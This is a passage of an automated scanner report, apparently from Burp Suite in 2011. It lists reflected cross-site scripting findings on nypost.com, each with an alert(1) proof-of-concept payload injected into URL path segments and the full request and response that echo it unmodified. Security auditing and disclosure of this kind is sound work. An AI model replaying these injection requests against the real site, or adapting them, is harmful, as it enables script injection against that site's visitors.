GET /r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html3a3f2<script>alert(1)</script>f91f8110b0b HTTP/1.1
Host: www.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1; __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; UnicaID=6rmqDxCzDKL-Wz2U94r; __utmc=1; __utmb=1.2.10.1297130884;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 727
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:37 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/shareit/fbconnect/xd_receiver.html3a3f2<script>alert(1)</script>f91f8110b0b</p>
...[SNIP]...

1.494. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d1ce3<script>alert(1)</script>7b2ba9f8543 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfigd1ce3<script>alert(1)</script>7b2ba9f8543/WebPortal/nypost/blocks/shareit/shareit.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:17 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfigd1ce3<script>alert(1)</script>7b2ba9f8543/WebPortal/nypost/blocks/shareit/shareit.js</p>
...[SNIP]...

1.495. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9a13a<script>alert(1)</script>44421082b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal9a13a<script>alert(1)</script>44421082b3/nypost/blocks/shareit/shareit.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 710
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:18 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal9a13a<script>alert(1)</script>44421082b3/nypost/blocks/shareit/shareit.js</p>
...[SNIP]...

1.496. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1bf97<script>alert(1)</script>4e4eae4a68f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost1bf97<script>alert(1)</script>4e4eae4a68f/blocks/shareit/shareit.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost1bf97<script>alert(1)</script>4e4eae4a68f/blocks/shareit/shareit.js</p>
...[SNIP]...

1.497. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c2ba4<script>alert(1)</script>c28bde5bbb6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocksc2ba4<script>alert(1)</script>c28bde5bbb6/shareit/shareit.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:36 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocksc2ba4<script>alert(1)</script>c28bde5bbb6/shareit/shareit.js</p>
...[SNIP]...

1.498. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a45a2<script>alert(1)</script>cdbd1fa948e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/shareita45a2<script>alert(1)</script>cdbd1fa948e/shareit.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:38 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/shareita45a2<script>alert(1)</script>cdbd1fa948e/shareit.js</p>
...[SNIP]...

1.499. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c6b92<script>alert(1)</script>039721b920c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.jsc6b92<script>alert(1)</script>039721b920c HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:40 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/shareit/shareit.jsc6b92<script>alert(1)</script>039721b920c</p>
...[SNIP]...

1.500. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 99311<script>alert(1)</script>1149864d175 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig99311<script>alert(1)</script>1149864d175/WebPortal/nypost/blocks/story_lists/story_lists.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:29 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig99311<script>alert(1)</script>1149864d175/WebPortal/nypost/blocks/story_lists/story_lists.js</p>
...[SNIP]...

1.501. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7204f<script>alert(1)</script>b6d157950da was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal7204f<script>alert(1)</script>b6d157950da/nypost/blocks/story_lists/story_lists.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:31 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal7204f<script>alert(1)</script>b6d157950da/nypost/blocks/story_lists/story_lists.js</p>
...[SNIP]...

1.502. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aa5f7<script>alert(1)</script>d4ffc399c68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostaa5f7<script>alert(1)</script>d4ffc399c68/blocks/story_lists/story_lists.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:33 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostaa5f7<script>alert(1)</script>d4ffc399c68/blocks/story_lists/story_lists.js</p>
...[SNIP]...

1.503. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e111f<script>alert(1)</script>c3c145edb11 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blockse111f<script>alert(1)</script>c3c145edb11/story_lists/story_lists.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blockse111f<script>alert(1)</script>c3c145edb11/story_lists/story_lists.js</p>
...[SNIP]...

1.504. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a0569<script>alert(1)</script>b1b95e01f44 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/story_listsa0569<script>alert(1)</script>b1b95e01f44/story_lists.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:37 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/story_listsa0569<script>alert(1)</script>b1b95e01f44/story_lists.js</p>
...[SNIP]...

1.505. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload e3c41<script>alert(1)</script>99ae3cfd7e7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.jse3c41<script>alert(1)</script>99ae3cfd7e7 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 719
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:38 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/story_lists/story_lists.jse3c41<script>alert(1)</script>99ae3cfd7e7</p>
...[SNIP]...

1.506. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 96919<script>alert(1)</script>9ef71511f62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig96919<script>alert(1)</script>9ef71511f62/WebPortal/nypost/blocks/top_story/top_story_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig96919<script>alert(1)</script>9ef71511f62/WebPortal/nypost/blocks/top_story/top_story_functions.js</p>
...[SNIP]...

1.507. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a3423<script>alert(1)</script>566e4fbef2a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortala3423<script>alert(1)</script>566e4fbef2a/nypost/blocks/top_story/top_story_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortala3423<script>alert(1)</script>566e4fbef2a/nypost/blocks/top_story/top_story_functions.js</p>
...[SNIP]...

1.508. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload daa52<script>alert(1)</script>4f66ae14dab was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostdaa52<script>alert(1)</script>4f66ae14dab/blocks/top_story/top_story_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:24 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostdaa52<script>alert(1)</script>4f66ae14dab/blocks/top_story/top_story_functions.js</p>
...[SNIP]...

1.509. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8827e<script>alert(1)</script>bdb9e0cf9a4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks8827e<script>alert(1)</script>bdb9e0cf9a4/top_story/top_story_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:26 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks8827e<script>alert(1)</script>bdb9e0cf9a4/top_story/top_story_functions.js</p>
...[SNIP]...

1.510. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b1929<script>alert(1)</script>2de6f914a76 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/top_storyb1929<script>alert(1)</script>2de6f914a76/top_story_functions.js HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:33:30 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/top_storyb1929<script>alert(1)</script>2de6f914a76/top_story_functions.js</p>
...[SNIP]...

1.511. http://www.nypost.com/r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 67ba7<script>alert(1)</script>f79943d7d67 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/top_story/top_story_functions.js67ba7<script>alert(1)</script>f79943d7d67 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
